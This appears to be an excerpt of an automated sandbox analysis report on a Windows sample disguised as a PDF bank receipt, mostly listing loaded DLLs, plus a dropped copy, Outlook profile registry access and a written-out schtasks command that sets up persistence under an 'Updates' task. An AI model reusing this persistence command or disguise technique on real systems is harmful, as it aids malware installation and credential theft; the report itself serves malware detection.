                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeAutomated click: OK
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mscorlib.pdb source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4162079442.0000000006324000.00000004.00000020.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4162004610.0000000006310000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0165272D push dword ptr [ecx]; ret 0_2_01652737
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_08155033 push eax; retf 0_2_08155039
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_081542B0 push ebx; ret 0_2_081542DA
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F3A29 push esp; ret 0_2_0A0F3A35
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0A0F3BC8 pushfd ; ret 0_2_0A0F3BD5
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeCode function: 0_2_0B84036B push ecx; ret 0_2_0B84036C
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0160272D push dword ptr [ecx]; ret 8_2_01602737
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D2C58 pushfd ; ret 8_2_018D2C65
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D26B0 push esp; ret 8_2_018D26BD
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_018D26E8 pushad ; ret 8_2_018D26F5
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 8_2_0892036B push ecx; ret 8_2_0892036C
                  Source: rDEKONT-1_16_2025__75kb__pdf.exeStatic PE information: section name: .text entropy: 7.598169781799861
                  Source: teXfNv.exe.0.drStatic PE information: section name: .text entropy: 7.598169781799861
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeFile created: C:\Users\user\AppData\Roaming\teXfNv.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
